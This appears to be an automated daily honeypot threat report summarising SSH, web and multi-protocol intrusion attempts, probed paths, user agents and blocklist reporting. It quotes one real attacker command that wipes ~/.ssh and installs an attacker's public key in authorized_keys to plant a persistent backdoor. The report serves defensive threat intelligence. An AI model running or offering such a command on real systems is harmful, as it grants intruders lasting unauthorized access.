💀 critical

Daily Threat Report

164 SSH Connections
136 Login Attempts
281 Commands Run
41 SSH Unique IPs
300 Protocol Events
27 Protocol IPs
63 Web Hits
24 Web Service IPs

Top Passwords Tried

  1. 91566946b1d8deb0
  2. aad3f9ba1d6740cc
  3. 6e86f2270ed47801
  4. 6460662e217c7a9f
  5. ebf20cefc9169e0b

🌐 WEB HONEYPOT — HoneyAI HTTP

AI-generated fake HTTP responses served to 63 scanner requests from 24 unique IPs (local, offline).

Top Paths Probed

  1. /
  2. /SDK/webLanguage
  3. /login
  4. /.env
  5. /.env.local

Top User-Agents

  1. Mozilla/5.0
  2. Mozilla/5.0 (X11; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0
  3. Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
  4. visionheight.com/scan Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36
  5. Mozilla/5.0 (compatible; Infrawatch/1.0; +https://infrawat.ch/)

# Automatic multi-platform threat intel reporting
$ honeypot-report.sh --since 24h
→ 118 IPs → AbuseIPDB  (community confidence scores updated)
→ 118 IPs → AlienVault OTX  (pulse indicators added)
→ 118 IPs → Blocklist.de  (auto-ban list updated)
→ 118 IPs → DShield/SANS  (global threat feed updated)

🀣 ATTACKER COMEDY CORNER

Real attempts. No actors were harmed in the making of this honeypot.

💻 Commands They Tried

cd ~ && rm -rf .ssh && mkdir .ssh && echo $_dqssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr$_dq>>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

These are real credentials and commands attempted by automated scanners and script kiddies. Logged, reported, and immortalized.

Automated report for 10 June 2026. Recorded 164 SSH connections on the Cowrie honeypot and 300 multi-protocol events on OpenCanary, from 68 unique IPs. 118 IPs were automatically reported to the AbuseIPDB community database.

SSH Activity (Cowrie)

The SSH honeypot received 136 login attempts from 41 unique IPs. Attackers executed 281 commands after gaining simulated system access.

Multi-Protocol Activity (OpenCanary)

Detected 300 events across services including FTP, Telnet, MySQL, Redis, VNC and Git from 27 distinct IPs. All events are access attempts against simulated production services.

HTTP Web Honeypot (Galah LLM)

The web honeypot received 63 HTTP requests from real scanners across 24 unique IPs. Each attacker received a fake response generated in real time by the local AI model qwen2.5:0.5b (Ollama, no internet connection required).

Network IDS (Suricata)

The network intrusion detection system generated 16721 alerts from 1356 unique source IPs. Suricata monitors all traffic on the primary network interface using Emerging Threats + AlienVault OTX rulesets.

← All Reports πŸ›‘οΈ Subscribe to blocklists β†’